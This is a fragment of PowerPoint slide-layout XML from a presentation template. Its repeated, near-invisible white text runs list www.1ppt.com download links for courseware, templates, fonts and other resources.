              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout82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82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82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82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8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83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83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83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83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83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83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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout83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83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83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83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8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84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84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84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84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84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84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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout84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84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84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84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8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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
